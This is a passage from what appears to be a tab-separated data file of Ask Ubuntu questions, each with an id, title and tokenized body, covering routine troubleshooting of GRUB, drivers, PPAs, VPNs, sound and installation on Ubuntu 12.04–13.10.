not going to be installed e : unable to correct problems , you have held broken packages . apt-get autoclean removed the held packages . this sends me looking for repositories but the curl and libcurl repositories are without libcurl4-gnutls-dev .
383602	can `` ubuntu-12.04.3-server-amd64 '' be installed on a work station with intel xeon cpu ?	everyone ! i want to install 64-bit ubuntu on our work station , but the downloaded iso file have an extension of `` amd64 '' , and our work station has a cpu of `` intel xeon ( e5540 2.53ghz*4 ) '' . can i install the downloaded `` ubuntu-12.04.3-server-amd64 '' on our work station ? any answer would be appreciated . thanks .
383603	win8.1 share secured with liveid	i 'm very new to the whole ubuntu thing , so please bear with : ) i have a password protected network share on a windows 8.1 machine ( secured with a microsoft liveid ) that i need to access from ubuntu . i 've looked around and seen people suggesting switching the win 8 machine to a local login rather than live login , but that is n't an option in this context - is there any way i can get ubuntu to authenticate on that share ? much obliged ! : )
383604	unable to restore ubuntu grub or reinstall ubuntu after installing windows 8.1	i was dual booting windows 7 and ubuntu 13.10 then i installed windows 8.1 , but now i ca n't login to ubuntu . i tried boot repair to restore the grub . after clicking on recommended repair it shows that the repair is successful but after restarting my pc it goes directly to windows 8.1 . i also tried using a live cd of ubuntu 13.10 opened the terminal and tried typing fdisk -l but it does not show any partition not even windows . when i try to install the ubuntu again it shows me only 1 option to erase the whole disk and then install . there is no option of installing alongside windows . please help me how to get the grub again or reinstalling it alongside windows 8.1 thanks in advance .
383605	how can i ( de ) activate a ppa from the command-line with a single command ?	ubuntu offers an easy gui interface that allows you to edit , ( de- ) activate and remove ppas . but going through all the gui dialogs and menus can sometimes be tedious , especially if you have a lot of ppas added to your system . that 's why i was wondering if there was a way to disable ( and enable ) a ppa from the command-line . note : i am not talking about adding/removing the ppa ( that 's quite easy to do : sudo add-apt-repository ppa / sudo add-apt-repository -- remove ppa ) . what i am looking for is a way to temporarily disable a ppa and reenable it at will - all from within the cli . edit : sushantp606 and davidson chua 's answers were a good starting point and made me change the scope of my question . it 's certainly good to know that repositories can be managed with the sources.list files but this still looks like a very tedious task to me . i would love to know if there is a way to automate this in the same manner the software properties window does . ideally i would like to find a command that will make it possible to quickly enable and disable a ppa by its ppa address , e.g . : ppa_activate ppa : synapse-core/ppa and ppa_deactivate ppa : synapse-core/ppa
383609	how to boot via usb from bios without a hard drive ?	i got a hp mini laptop and i cant get past the bios . when i go to test hard drive it says read element of test failed . i figure it means it needs a new hard drive . so i thought i would download ubuntu to a usb in order to see if it needs anything else . i set the usb with the iso to default boot device but do i need to mount it to the usb or something ?
383611	how to see all installed softwares ?	i am using ubuntu 12.04 operating system . can you please tell me what is the command to see all installed softwares in my system ?
383613	ubuntu 13.10 mirror display error	i 've just upgraded my ubuntu to 13.10 saucy using dist-upgrade . after upgrading , i ca n't mirror my display when connected to a projector . it seems that it is related to this problem . any solutions to this problem ?
383615	can i change wacom bamboo touch settings ?	i have a wacom bamboo touch tablet connected to my ubuntu computer , and there are two annoyances : the touchpad-mouse cursor is much too sensitive , making it impossible to click anything . two-finger touch ( scroll ) has a delay of ~ half a second before scrolling . how do i remove this ? i 've looked around a lot and basically there is no gui control panel at all . when you enter : xsetwacom -- list parameters you get a lot of parameters that can be changed , but the only thing that seems to relate to touch is turning it on or off : xsetwacom -- set `` wacom bamboo 2fg 4x5 finger touch '' touch off
383617	internet does n't work with kubuntu	i have installed ubuntu with gnome and kubuntu 13.04 . they are not different installation , i added kubuntu to my original 13.04 gnome ubuntu 64-bits . when i log in with gnome , internet works fine . when i login with kubuntu , it does n't work at all . my ethernet card works fine , because i can access the router configuration page in kubuntu . i have a wired connection .
383618	skype problems ( strange noises , and mic not working )	i recently did a fresh install of ubuntu 13.10 64-bit on my hp compaq pro 6305 . after installing a few of my most used applications , i went and installed skype . i logged in and tried to test the sound and microphone , here 's where my first problem occurred . it would not hear me at all , and my microphone worked fine on windows . i went into skype options and my only sound and recording device choice was pulseaudio , and i constantly have problems with that ( although i think those times were my fault ) but i had just installed this and it was already messing up on me . this is where my second problem happens . the sound continues to work fine most of the time , except for every so often when it starts crackling , and in some cases the whole thing just starts making a weird high-pitched buzzing noise that wo n't stop unless i restart skype . both the 32-bit .deb install and the multi-arch .deb install do this for me . it 's a headset + microphone from cyber acoustics if that means anything as well . i 'm really not sure what else too say , i hope you can figure something out based on that info .
383624	can not load all websites	i am having problems loading websites in my xubuntu 13.10 . i 've had his problem before upgrading . the wireless connection is great and i can load google but not anything else i tried . everything works fine if i connect to another network . also when i boot windows in my machine i can browse fine . have any ideas.. ?
383629	ca n't log on to ubuntu 13.10	i downloaded ubuntu 13.10 using netbootin cd 5.2 and everything went okay till i tried to log on . it asked for my username and password and that went okay but then it asked for ( : ~ $ ) and i did n't know what to enter after that . i am really unfamiliar with terminal language . please help . jim
383634	airtel 3g dongel not working on kubuntu13.04	i have airtel 3g modem and its not detected by kubuntu also tried in network manager to setup but it is not showing mobile broadband . now i want it to detect when i plugin the modem . details are as under usb-devices output : t : bus=03 lev=01 prnt=01 port=03 cnt=01 dev # = 4 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=12d1 prodid=1446 rev=00.00 s : manufacturer=huawei technology s : product=huawei mobile c : # ifs= 2 cfg # = 1 atr=e0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver= ( none ) i : if # = 1 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage and also trying command sudo modprobe usbserial vendor=0x12d1 product-1446 error : could not insert 'usbserial ' : invalid argument
383636	12.04.3 can start only after press `` resume '' in rescue mode ( every boot ) - problem with nvidia driver	i tried to install maybe ten linux distros on my new pc , and every time i have problems with video driver : black screen or visual artefacts . i was able to install only ubuntu 12.04.3 x64 lts , but also with problems : black screen on startup ( sometimes all was normal when i used live mode before install , sometimes i was not able to load live mode - ubuntu say that i have problems with video and give me choice with four elements , one of them - use safe graphics mode , but i even ca n't choose this - the system is frozen ) . in tty i install nvidia-current , but it not helped me . every boot i need press esc and enter to rescue mode and just press resume and after this normal boot work . if i try to make normal restart - black screen after ubuntu logo again and for normal work i need again go to rescue mode ( just press reset - ubuntu automaticaly will load rescue mode ) . i tried switch nvidia driver in options - i have version 319-updates and version 319 [ recommended ] - nothing . i have palit geforce gtx650 , all updates . my dmesg output . my output of dpkg -- get-selections | grep 'nvi\|nou ' . my /boot/grub/grub.cfg
383640	how to delete grub in dual boot of windows 8 and ubuntu	i had installed windows 8 and ubuntu in my laptop . but after that by mistake i formatted the drive in which ubuntu was installed so now when ever i reboot my machine i get the error : unknown filesystem and grub rescue . i want to reinstall ubuntu again in the same drive but i am unable to install because of grub rescue . please suggest me solution to install ubuntu from grub rescue or to delete grub so that i can reinstall ubuntu in normal way . i am able to boot to windows if i keep the boot mode to uefi .
383643	dual boot problem : system wo n't boot into ubuntu after booting into windows 8	hello everyone , i am a total noob at all of this so please forgive me if my question is filled with ignorance . i have successfully set up a dual boot of ubuntu 13.10 and windows 8 on my asus vivobook s400ca touch screen . i have no problem booting straight into ubuntu , i can then successfully reboot into windows 8 by choosing `` windows uefi bkpbootmgfw.efi '' on the grub 2.0 start up window . the problem comes up when i want to then boot back into ubuntu after booting into windows . after the grub window appears ubuntu tries to open but it freezes on a dark purple screen . i can get around this by booting onto an ubuntu usb and rerunning the boot repair , after which i can again successfully boot into ubuntu , or at least until i boot windows again . my guess is that windows boot manager is changing something every time it opens and refusing to recognize any other os . does anyone know what windows is changing and if there is a way to turn it off . if it is of any help the boot repair provided this url , after repairs . here thanks in advance for your help . viva ubuntu !
383644	how to solve `` wrong sources.list entry or malformed file '' ?	i 'm a new user of ubuntu 13.10 so far so i do n't have too much technical expertise . i recently tried to resolve a skype installation issue and added some ppa involving binary-1386 . every time when i run sudo apt-get update , i get the following error : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/saucy/release unable to find expected entry 'restricted/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) ... ( ca n't post more than 2 links here since i 'm a new poster ) ... e : some index files failed to download . they have been ignored , or old ones used instead . i have spent the last two hours trying to resolve this issue , and made changes to my sources.list file by resetting to the default saucy settings , but these errors are still occuring . i 've also unchecked everything in software and updates section , but this still seems to appear . the error messages seem to be related to the 'binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) issue as shown above .
383647	ejabberd with ldap roster	i am currently configuring ejabberd server to work with rosters stored in ldap . i have achieved this with mod_shared_roster_ldap . it works great , but i wanted to know if there is another way to build ldap rosters in ejabberd . at the moment my rosters are bidirectional ( i am your list and you are in mine ) . what i want is to give a ldap user the ability to choose if he wants to be in another users roster . hope i explained it correctly . thank you .
383649	how to make pcmanfm foremost window on launch ?	often when pcmanfm is launched instead of being placed as the foremost window on the desktop , it is placed in the gnome-panel and does not get placed as the foremost window . ie it is started in the background with the current foremost window retaining priority . it becomes annoying have to make another click in the gnome-panel to bring to the top . is there a way to place the newly opened pcmanfm as the foremost window , with regards to pcmanfm specifically and perhaps a generic solution , in case this behavior occurs with other applications . specs : ubuntu 12.04.3 pcmanfm 1.1.2 lightdm 1.2.3 gnome metacity ( classic no effects )
383651	ubuntu 12.04 installation error in windows 7	how can i fix this error ? gave up waiting for root device . common problems : - boot args - check root delay= ( did the system wait for long enough ? ) - check root= ( did the system wait for the right device ? ) - missing module ( `cat/proc/modules ; ls/dev` ) alert ! /dev/disk/by-uuid/3c50bc8050bc4286 does not exist does not exist . dropping to shell !
383652	ubuntu unable to start stuck at splash screen , ubable to reinstall end with black screen	i am new to ubuntu . i am using ubuntu 12.04 , yesterday my pc hags up and i waited for few minutes it does n't responded , i shutdown forcefully . using shutdown button . when i started my ubuntu it hangs up at the splash screen with 2-4 dots . i am unable to use ubuntu using bootable usb . what can be problem ? also , i am using it in dual boot . window is working fine but there is problem with ubuntu only . please suggest me any solution to save my data . your help will be really appreciated . regards vidya sagar
383656	how do i get my sound to work	i recently installed ubuntu 13.10 and am having trouble with no sound output . this was never an issue with 11 , which was the last one i used . i am using an hdmi cable for video and audio this time rather than the vga and i 'm not sure if that is an issue or not . when i open my sound properties i have the digital output ( s/pdif ) and the analog output but both are greyed out with the exception of the balance and in the analog ouput i am only able to select analog stereo output and when i test the sound on either nothing comes through sound wise . my desktop is hooked up to a 40 '' westinghouse tv which i 've been using with my desktop and works great with windows 7 . any help would be appreciated .
383657	recovering files after deleting adminstrative user accidentally	i have accidentally deleted my administrative user from the /etc/passwd file and rebooted the system . any work around how to access my files there . i am using a virtual machine . regards , prateek
383663	back and front panel usb port not working on ubuntu 12.04	back and front panel usb port not working on ubuntu 12.04 . please help me and suggest me the solution of this issue . thanking you in advance
383676	amd radeon hd8970m graphic drivers in ubuntu 12.04 lts	i tried many fglrx drivers in ubuntu , but none seems to be able to make full potential of my hard core gaming graphic . the driver provided by ubuntu says unsupported amd hardware detected . everything still works ( perhaps using hd8650 or using basic garphic render from amd ) . my question is : will ubuntu release an update that will support my graphic card ? note : i did tried to install drivers in amd website , but x server went dead after an update .
383678	will htc desire c be suported ?	will htc desire c is supported please i am interested because i will be having problem in installing the operating system so please i am requesting you sir mam to help me
383679	peech-dispatcher disabled edit /etc/default/speech-dispatcher	just run ubuntu software updates and installed ubuntu 13.04 . after this installation and reboot , i can not log in to computer as admin , ( only as guest ) . when i want to login as admin , i am getting peech-dispatcher disabled edit etc/default/speech what is the problem and how to login to my computer as admin ?
383680	creating img file into fat32	i 'm trying make an img file into fat32 and i get some problems ... here is the code i execute : ~ $ sudo dd if=/dev/zero of=./testimage bs=10000000 count=1 then the output i get is : 1+0 records in 1+0 records out 10000000 bytes ( 10 mb ) copied , 0.0609494 s , 164 mb/s then if i do this code : ~ $ sudo mkfs.vfat -f 32 ./testimage then the output i get is : mkfs.vfat 3.0.12 ( 29 oct 2011 ) warning : not enough clusters for a 32 bit fat ! i am trying to debug my code but i ca n't create fat file to debug ... thx in advance~
383682	can not boot ubuntu or windows 7 after install ubuntu 13.10	i am trying to install ubuntu 13.10 on a hp z620 workstation , which is originally installed with window 7 . however , after i installed ubuntu , i can not login into both systems , and the startup indicates to startup repair . after i run the startup repair , i can login window 7 again , but not ubuntu . i also tried to re-install the grub from ubuntu boot cd using the method from this link , and the same problem still remains . i guess the ubuntu system is successfully installed along with the grub , but the grub may be installed in the wrong location . seems the system 's boot location is hidden in some other locations . but i am not clear about it ? the following is a photo of my partition information , and i am installing the ubuntu system on /dev/sdg7 the disk partition information : http : //i.stack.imgur.com/hn7ly.jpg edit : i have tried the boot-repair following instruction here : [ https : //help.ubuntu.com/community/boot-repair ] . after that , i can boot the ubuntu system . however , i can not find the windows 7 in the menu .
383684	how do i create a wifi - hotspot using my wired connection ?	how do i create a wifi - hotspot using my wired connection ? i went to network settings - wirless and clicked on start hotspot but my mobile phone is not able to detect the hotspot .
383686	wolbby plugin error	i just installed ubuntu 12.04 , almost everything works beside some plugins . my compiz does n't have the wolbby plugin ! i ca n't even check on the 3d windows and cube reflection plugins . when i installed ubuntu from windows by wubi web installed it worked good , all the plugins are visible , but now that i installed it from the iso , some plugins either do not work or are not visible .
383695	how to install canon lbp2900b drivers ?	i am trying very hard to install canon lbp2900b printer in ubuntu 13.10 . i have searched and googled a lot for the solution over fortnight but none of the site / link gave me the simple solution for me . how can accomplish my goal ?
383699	installed ubuntu through vm ware 8.0.0 , now the problem is ubuntu is displaying in small window and how to maximize it	i have installed ubuntu 13.10 thru vm ware workstation 8.0.0. now ubuntu is displaying in small window and how i can maximize screen size which is equal to laptop screen . i tried all possible ways but not able to succeded . some one in google told to vga=798 or 791 in grub file and some one told to enter same resolution that of laptop . but grub is not allowing to do any changes and it is telling that i dont have rights to change . please help to how i can maximize ubuntu screen in virtual machine .
383700	install ubuntu into virtual machine	all , i download ubuntu-12.04.3-desktop-amd64.iso try to install it in the vmware . during the installation , everything looks fine . but when it install the vmware tools . it seems it did n't fail with it .but why i ca n't see the graphic ui ? any one know what happen to it ? thanks .
383704	ubuntu for android on samsung galaxy note	will ubuntu for android work on a samsung galaxy note . and if so , where can i get a decent docking device with hdmi and usb interfaces
383706	problem with opening .sh file in ubuntu 13,10	i have problems opening a the .sh file for cytoscape in ubuntu 13.10 . i click on it but it does nothing ! when i try to use the terminal it opens but shows lots of codes and does not run . sorry if this a silly question i am new to ubuntu .
383709	how to increase permgen space of java in ubuntu 13.04	how to increase permgen space of java in ubuntu 13.04 ? i am using java sun/oracle jdk 6
383712	changing default `` open with '' to a console based application	i have a chess program that runs from the command line by doing `` scid '' . i want to be able to open .pgn files automatically with scid . however , when i right click on a .pgn file and go to `` open with '' , i ca n't find scid . how do i go about changing the default .pgn program opener to scid ? i use ubuntu 13.10 .
383720	gui theme has become black and white type , with strange icons	my ubuntu 12.04 lts precise had a few improper shutdown , and one day when i resumed it from suspended state the gui became as seen in the screenshot below . the icons have all become strange , and the interface has become as if in a black and white theme . tried doing a proper restart many times , but did n't work . logs in /var/log do n't show any error . can any one give me a hint what exactly is going wrong ? ? screenshot of my desktop : i could not solve the issue , had tried many things . so i simply re-installed the os . i do not know how to withdraw the question , so if some one can delete it , please do so . thanks .
383722	how confidential are automatic crash reports made by apport ?	i noticed that starting with ubuntu 13.10 ( or maybe 13.04 ) , thunderbird crash reports are handled by apport , while they were handled by mozilla 's tool before . question how confidential are automatic crash reports made by apport ? i have not seen any option to tell that the program memory may include confidential information . search before you post i could not see any official information from ubuntu pages , only how to use apport to report bugs in ubuntu | ubuntu manual dated 2011 that says : if you were entering confidential information when the crash occurred you should click 'cancel ' . additional questions for example , if thunderbird , evolution or any mail tool crashes : will the report include the internal state of the program , possibly including parts of e-mails that may include confidential ( e.g . business ) content ? will that possibly confidential content be sent to ubuntu servers ? ( that alone may be a problem ) if yes , will it be treated confidentially or made a public bug report ? thank you for your attention .
383724	how do i install wallpapers of 13.10 on 13.04	i am using ubuntu 13.04 ( raring ) and wants to install the official wallpapers of 13.10 ( saucy ) - i know , it can be done by downloading them from internet . after searching a lot got sudo apt-get install ubuntu-wallpapers-oneiric for installing wallpapers of 11.10 and similar commands for previous builds , but what about 13.10 , how can i install them on 13.04 . i have allready tried sudo apt-get install ubuntu-wallpapers-saucy but it did not work.it just says as below
383727	make a string from array of strings	i have a piece of bash code , in which i would like to make a long string from an array of strings . the bash code is as follows : # load all the snps arrsnpstobeextracted= ( $ ( cat $ indexfilename ) ) arrsnpsstring= '' \ '' '' lenarrsnpstobeextracted= $ { # arrsnpstobeextracted [ * ] } si=0 while [ $ si -lt $ lenarrsnpstobeextracted ] do arrsnpsstring= $ { arrsnpsstring } '' | '' $ { arrsnpstobeextracted [ $ si ] } # echo $ si '' : `` $ { arrsnpsstring } let si++ done arrsnpsstring= $ arrsnpsstring '' \ '' '' echo $ arrsnpsstring ===================== as you can see , i have a list of snps ( words ) : word1 word2 word3 and i want to make it like this : '' word1|word2|word3 '' this string is assigned to arrsnpsstring , but i can not make it happen . what am i doing wrong ? as you can see in the code , the arrsnpsstring should get longer , but instead , it takes at the end of the while loop only the last item . i know it has something to do with local and global environments/variables . i want to extend a global string arrsnpsstring in a local loop . does someone know how i can solve this problem
383728	95-keyboard-force-rules - help	i 've just installed ubuntu onto my 'lenovo z370 ' and its great . i need to disable some functions in the 95-keyboard-rules /lib/udev/rules.d/95-keyboard-force-release.rules but when i go there there is no file . is this something i need to create ? if so how do i do this ? or is this something i need to download via terminal ? any help would be appreciated james
383729	c++ ide problem ubuntu 13.10	i 'm installed eclipse cdt in my os ( ubuntu 13.10 ) but i cant create c++ project , im already insalled qt creator but i cant create c++ app in qt too ... im installed g++ 4.8
383730	ubuntu wo n't boot after updating time	i have a laptop that is a dual boot windows 8/ubuntu 12.04 machine . i recently noticed that while in windows , my system time was off . i tried to change it from within windows but it reset every time i rebooted . my first thought was that the cmos battery was bad but the clock was working just fine in ubuntu . i double checked the bios and since the clock was off there , i adjust the time and rebooted . now , ubuntu no longer boots . i 'm very new to ubuntu ( just got it installed and working for the first time tuesday ) so i have no idea where to go from here . any help would be great . thanks !
383731	matlab 2013b on ubuntu 12.04 matlab_java problem	i 'm on ubuntu 12.04 and i have installed matlab 2013b . it 's running . however , i have some graphical issues like empty windows and unreadable hints . i found out that its due to the java version 1.7 : > > version -java > > ans = > > java 1.7.0_11-b21 with oracle corporation java hotspot ( tm ) 64-bit server vm mixed mode i tried to set a path variable to java 6 with export matlab_java=/usr/lib/jvm/java-6-oracle/jre/ when i try to start matlab with this variable set , it fails with fatal error on startup : can not locate com/mathworks/jmi/opaquejavainterface class can anyone help me ?
383734	xrandr does not show hdmi	i 'm trying to connect my dell inspiron n5110 ( ubuntu 13.04 ) to samsung s24c350h monitor via hdmi . when i plug my cable to laptop and to the monitor nothing happened . i tried system settings - > displays - > detect displays but that did no any good . xrandr output below : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 40.1 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) lspci output below : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.7 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 8 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 ide interface : intel corporation 6 series/c200 series chipset family 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation 6 series/c200 series chipset family 2 port sata ide controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 525m ] ( rev ff ) 01:00.1 audio device : nvidia corporation gf108 high definition audio controller ( rev ff ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 09:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 0b:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) nvidia driver and bumblebee installed . hdmi socket and the monitor works on windows pretty well .
383735	org.freedesktop.nm_dispatcher - ubuntu eror	i have ubuntu 13.10 installed . i started having issues like my system locking up or screen turning off though cpu seems busy and running . i have to reboot to fix it . i tried checking the syslog file , i am new to ubuntu , could not understand what it means . please help me fix this : ( nov 29 15:45:54 phanitej-ep43t-ud3l colord : device removed : xrandr-goldstar company ltd-w1941-77009 nov 29 15:45:54 phanitej-ep43t-ud3l colord : profile removed : icc-d9f2c39da26b2c95896b6178986dd568 nov 29 15:45:54 phanitej-ep43t-ud3l networkmanager [ 986 ] : < warn > error requesting auth for org.freedesktop.networkmanager.wifi.share.protected : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.26 ' : no such name nov 29 15:45:54 phanitej-ep43t-ud3l networkmanager [ 986 ] : < warn > error requesting auth for org.freedesktop.networkmanager.wifi.share.open : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.26 ' : no such name nov 29 15:45:54 phanitej-ep43t-ud3l networkmanager [ 986 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-network : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.28 ' : no such name nov 29 15:45:54 phanitej-ep43t-ud3l networkmanager [ 986 ] : < warn > error requesting auth for org.freedesktop.networkmanager.sleep-wake : ( 3 ) nov 29 15:45:54 phanitej-ep43t-ud3l networkmanager [ 986 ] : < warn > error requesting auth for org.freedesktop.networkmanager.enable-disable-wwan : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.28 ' : no such name nov 29 15:45:54 phanitej-ep43t-ud3l networkmanager [ 986 ] : < warn > error requesting auth for org.freedesktop.networkmanager.wifi.share.protected : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.28 ' : no such name nov 29 15:45:54 phanitej-ep43t-ud3l networkmanager [ 986 ] : < warn > error requesting auth for org.freedesktop.networkmanager.wifi.share.open : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.28 ' : no such name nov 29 15:45:54 phanitej-ep43t-ud3l networkmanager [ 986 ] : < warn > error requesting auth for org.freedesktop.networkmanager.settings.modify.hostname : ( 3 ) gdbus.error : org.freedesktop.dbus.error.namehasnoowner : gdbus.error : org.freedesktop.dbus.error.namehasnoowner : could not get uid of name ':1.28 ' : no such name nov 29 15:45:56 phanitej-ep43t-ud3l kernel : [ 299.812150 ] mce : [ hardware error ] : machine check events logged nov 29 15:45:56 phanitej-ep43t-ud3l dbus [ 740 ] : [ system ] activating service name='org.freedesktop.systemd1 ' ( using servicehelper ) nov 29 15:45:56 phanitej-ep43t-ud3l dbus [ 740 ] : [ system ] successfully activated service 'org.freedesktop.systemd1' nov 29 15:45:57 phanitej-ep43t-ud3l rtkit-daemon [ 1336 ] : successfully made thread 1858 of process 1858 ( n/a ) owned by '1000 ' high priority at nice level -11 .
383738	best most stable partition layout for linux	i had had many issues regarding data loss due to grub breakage & unable to boot in my os e.g see my latest mishap here : grub rescue unknown filesystem ... the ultimate hopelessness the problem lies in the fact that i want a stable yet portable os able to boot in computers of varied hardware profiles . so far in my experience of 3 years or so the best was offered by debian ( precisely crunchbang ) ! it never got corrupted & provided an overall stable performance though the lack of latest technologies incorporation made me to look towards lts ubuntu versions . what i want is a stable partition profile with atleast one ntfs partition that will act as buffer storage b/w windows & *nix os . i mostly use mechanical 2.5 ' hd encased in portable casing therefore i want an advice for the best stable partition profile to ensure consistency for instance my crunchbang layout is : disk /dev/sdb : 31.4 gb , 31440961536 bytes 255 heads , 63 sectors/track , 3822 cylinders , total 61408128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007199b device boot start end blocks id system /dev/sdb1 2048 42975231 21486592 7 hpfs/ntfs/exfat /dev/sdb2 * 42975232 60792831 8908800 83 linux /dev/sdb3 60792832 61407231 307200 82 linux swap / solaris /dev/sdb1 : label= '' crunch '' uuid= '' 0618c75418c74183 '' type= '' ntfs '' /dev/sdb2 : uuid= '' 351b88b1-0c89-4ce2-ae29-3d2986f4c67f '' type= '' ext4 '' /dev/sdb3 : uuid= '' 63aedc80-77c3-4ce4-9533-8bc3bd6496b9 '' type= '' swap '' further notes : my company is primarily intel powered so by `` varied hardware profiles '' i do n't mean amd only intel x32 but you know this includes pentium d onwards to i7
383741	how can i force workrave to start in normal mode ?	i use workrave for rsi prevention and rest breaks . [ * ] sometimes i need to put it in quiet or suspended mode , for example when giving a presentation . however , it remembers this setting the next time i log in , and i might forget to put it back . how can i make workrave always start in normal mode ? [ * ] it starts up every time i log in , but i ca n't remember/find how i did this .
383746	openvpn works in terminal , but not via network manager	i managed to setup openvpn connection , which works via terminal : sudo openvpn -- config '/home/deckoff/desktop/vpn/config.ovpn' this is usernmae/password login , i have ca.crt and config.ovpn files . i have installed the network-manager plugin , added the ca.crt location . when i connect , i am informe , that i have connected successfully , but i have no internet access ... i suppose that i have to add the correct config.ovpn in the network manager plugin . i can not see where to config the hostname/ip settings in the dialog here is how my dialog looks like , i have deleted the gateway and username entries this is the content of the config.ovpn file client dev tun proto udp remote 1.1.1.1 1194 resolv-retry infinite nobind persist-key persist-tun ca '/home/deckoff/desktop/vpn/ca.crt' auth-user-pass comp-lzo verb 3
383747	how to configure pkexec to not ask for password ?	i have a gui application that needs to call a daemon ( written in python ) with superuser privileges . i would like to do this without prompting the user for a password . since the daemon is a script , i ca n't set the suid bit directly . i could write a c wrapper for this , but i 'd rather not reinvent the wheel , especially when a mistake on my part could lead to the system 's security being severely compromised . what i 'd normally do in this situation is to add a line in /etc/sudoers that allows users to execute the daemon as root without a password , using the nopasswd directive . this works fine from the command line . however , when i do this from the gui , a pkexec dialog pops up asking for the user 's password . it seems that on ubuntu , calls to sudo from the gui are somehow being intercepted by pkexec . is there a clean way around this ? i 'd really rather not have to deal with the hassles of a setuid script .
383748	ubuntu 13.10 with encryption installed manually wo n't load on ssd	i want to install ubuntu 13.10 on my new ssd drive in laptop . i have no other os and want to use whole disk for ubuntu installation . however , i 've read that it 's best to leave some unallocated space on ssd to extend its lifetime . i also want to use a whole disk encryption to secure all my data . and that 's the problem : a default installing option that allows you to use encryption does n't allow to manage partitioning details before installation . of course i tried to perform manual partitioning using 'something else ' option in ubuntu installer . i 've followed instructions at this website to createa separate boot partition and encrypted partition for the os and i have left some unallocated space . i have left default options of installing the loader on /dev/sda instead of a particular partition . however , after completing installation successfully i can not access my os , for there is no grub loading at startup , and bios does not detect any hard drive in 'boot device ' option . i tried to manually install grub from livecd , but the permission to disk was denied . earlier , when i was using a default setting 'erase disk and install ubuntu ' , everything was working fine , but there was no unallocated space on ssd and shrinking an encrypted partition using command line is far too difficult for me . i 'm not that familiar with linux systems , so maybe i 'm doing some stupid mistake that can be easily solved ?
383753	atheros ar9462 wireless card unstable when wifi router `` auto channel '' is selected	i 've got a qualcomm atheros ar9462 wireless network adapter ( rev 01 ) on an acer v5-531 laptop , using kubuntu 12.04.3 lts . i noticed that the wifi connection is stable and good only when the router has a fixed channel selected ( not auto ) . is there any way to patch the ath9k driver code so to allow a stable connection also when the auto channel selection is used by the router ?
383754	read error while installing draftsight in ubuntu 13.04	root @ porjecta : / # gdebi draftsight.deb reading package lists ... done building dependency tree reading state information ... done building data structures ... done building data structures ... done with draftsight , you can easily create professional cad drawings . supported file formats are dwt , dxf and dwg . do you want to install the software package ? [ y/n ] : y ( reading database ... 213876 files and directories currently installed . ) unpacking dassault-systemes-draftsight ( from draftsight.deb ) ... access control disabled , clients can connect from any host access control disabled , clients can connect from any host access control disabled , clients can connect from any host access control enabled , only authorized clients can connect access control enabled , only authorized clients can connect access control enabled , only authorized clients can connect dpkg-deb ( subprocess ) : decompressing archive member : internal gzip read error : ' < fd:4 > : invalid stored block lengths' dpkg-deb ( subprocess ) : can not copy archive member from 'draftsight.deb ' to decompressor pipe : failed to write ( broken pipe ) dpkg-deb : error : subprocess < decompress > returned error exit status 2 